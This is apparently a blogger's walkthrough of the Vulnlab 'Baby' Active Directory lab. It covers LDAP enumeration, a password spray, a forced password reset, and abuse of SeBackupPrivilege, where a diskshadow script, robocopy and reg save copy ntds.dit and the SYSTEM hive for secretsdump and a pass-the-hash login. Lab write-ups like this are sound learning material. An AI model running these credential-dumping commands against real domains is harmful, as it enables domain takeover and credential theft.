Baby, an Active Directory machine crafted by xct in vulnlab, facilitates LDAP enumeration and exploits user privileges to retrieve the machine database for hash dumping and exploitation.
Enumeration
Start a nmap scan to look for open ports and add the necessary flags for in depth enumeration.
From the scan we can take note of the domain name (baby.vl) and start the process of null enumeration.
After running through null enumerating for SMB and RPC, we are able to find some insights on the domain with ldap enumeration.
ldapsearch -x -H ldap://10.10.124.116 -b "dc=baby,DC=vl"
ldapsearch gives out a whole bunch of data we can specifically choose to filter out just the usernames and its descriptions as sometimes sysadmins might put default passwords in the description field.
Did a password check for the Teresa.Bell user as stated in the ldapsearch results, but it was a wrong password.
With the users found in ldapsearch, I created a user list and did a password spray.
The Caroline.Robinson user has STATUS_PASSWORD_MUST_CHANGE.
Initial Foothold
Use impacket-smbpasswd to change the password of the user.
impacket-smbpasswd baby.vl/Caroline.Robinson:'BabyStart123!'@10.10.127.109 -newpass 'Password123!'
With the new credentials created start the necessary enumerating process like ldap, SMB, RPC etc.
Check for machine access such as RDP and WINRM.
We are able to WINRM into the user.
Once in the local machine after user enumeration is done, we find the user has the privilege of SeBackupPrivilege.
Designed to enable users to create system backups, this privilege grants full read access to the file system. From an attacker’s viewpoint, exploiting this involves gaining initial access, then elevating to a higher shell to read SAM files and potentially crack passwords of high-privilege users on the system or network.
Privilege Escalation
There are two methods for utilizing this privilege: one applies to standalone machines, while the other pertains to domain-joined machines.
I made the mistake of using the standalone method and retrieved the wrong hashes for Administrator.
The right method is the following.
Use the diskshadow function to copy the drive that is currently in use.
First, we need to create a .dsh file on our local machine.
set context persistent nowriters
add volume c: alias persecure
create
expose %persecure% z:Convert it to dos.
unix2dos diskshadow.dshUpload the .dsh into the victim machine.
diskshadow /s diskshadow.dsh
Use the RoboCopy tool to copy the file from the Z Drive to the Temp Directory.
robocopy /b z:\windows\ntds . ntds.dit
Then extract the system hive file.
reg save hklm\system c:\Temp\systemTransfer both files to your local machine either by the download function in evil-winrm or a SMB server.
Use impacket-secretsdump to extract the hashes.
Use evil-winrm to gain access to the administrator via its hash.
And we have shell as an admin user.
Persecure : my learning archive 